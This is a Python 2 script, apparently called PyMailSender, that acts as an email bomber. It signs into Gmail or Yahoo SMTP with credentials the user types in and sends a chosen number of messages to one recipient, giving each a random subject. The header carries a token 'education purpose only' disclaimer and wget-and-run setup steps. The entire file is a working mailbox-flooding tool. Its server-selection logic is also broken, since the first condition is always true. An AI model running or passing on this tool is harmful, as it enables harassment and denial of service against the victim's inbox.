#!/usr/bin/python
# -*- coding: utf-8 -*- 
# This code for education purpose only.
# Active your 'Less Secure Apps' for Google Mail
# https://myaccount.google.com/lesssecureapps
# Open terminal
# wget https://gist.githubusercontent.com/abaykan/4b8dcd5fa7dcb741603612eaa059e5b5/raw/c540d79296ee1090f0b483b6a9f44feb9cb88221/pymail
# chmod +x pymail
# ./pymail

import os
import smtplib
import getpass
import sys
import time
from colorama import Style, Fore

os.system('clear')
print Fore.CYAN + """
┌─────────────────────────────────┐
│▛▀▖   ▙▗▌   ▗▜ ▞▀▖        ▌      │
│▙▄▘▌ ▌▌▘▌▝▀▖▄▐ ▚▄ ▞▀▖▛▀▖▞▀▌▞▀▖▙▀▖│
│▌  ▚▄▌▌ ▌▞▀▌▐▐ ▖ ▌▛▀ ▌ ▌▌ ▌▛▀ ▌  │
│▘  ▗▄▘▘ ▘▝▀▘▀▘▘▝▀ ▝▀▘▘ ▘▝▀▘▝▀▘▘  │
│         abaykan.com             │
└─────────────────────────────────┘
""" + Style.RESET_ALL + """
For Gmail Server you Have to Enable "less Secure app"
https://myaccount.google.com/lesssecureapps
"""
def bomber():
    if os.name == 'nt':
        os.system('cls')
    else:
        os.system('clear')

server = raw_input (Fore.CYAN + 'MailServer:' + Style.RESET_ALL + ' 1.Gmail | 2.Yahoo: ')
user = raw_input(Fore.CYAN + 'Email:' + Style.RESET_ALL + ' ')
passwd = getpass.getpass(Fore.CYAN + 'Password:' + Style.RESET_ALL + ' ')


to = raw_input(Fore.CYAN + '\nTo:' + Style.RESET_ALL + ' ')
subject = raw_input(Fore.CYAN + 'Subject:' + Style.RESET_ALL + ' ')
body = raw_input(Fore.CYAN + 'Message:' + Style.RESET_ALL + ' ')
total = input(Fore.CYAN + 'Number of send:' + Style.RESET_ALL + ' ')

if server == 'gmail' or '1' or 'Gmail':
    smtp_server = 'smtp.gmail.com'
    port = 587
elif server == 'yahoo' or '2' or 'Yahoo':
    smtp_server = 'smtp.mail.yahoo.com'
    port = 25
else:
    print 'Kindly Enter Your Answer in 1 or 2 in Mail Server.'
    sys.exit()

print ''

try:
    server = smtplib.SMTP(smtp_server,port)
    server.ehlo()
    if smtp_server == "smtp.gmail.com":
            server.starttls()
    server.login(user,passwd)
    for i in range(1, total+1):
        subject = os.urandom(9)
        msg = 'From: ' + user + '\nSubject: ' + subject + '\n' + body
        server.sendmail(user,to,msg)
        print "\r" + Fore.CYAN + "[+]" + Style.RESET_ALL + " E-mails sent: %i" % i
        sys.stdout.flush()
    server.quit()
    print '\n Done  !!!'
except KeyboardInterrupt:
    print '[-] Canceled'
    sys.exit()
except smtplib.SMTPAuthenticationError:
    print '\n[!] The username or password you entered is incorrect.If You are using Gmail Service Than Check You Allowed "Less Secure App"'
    sys.exit()
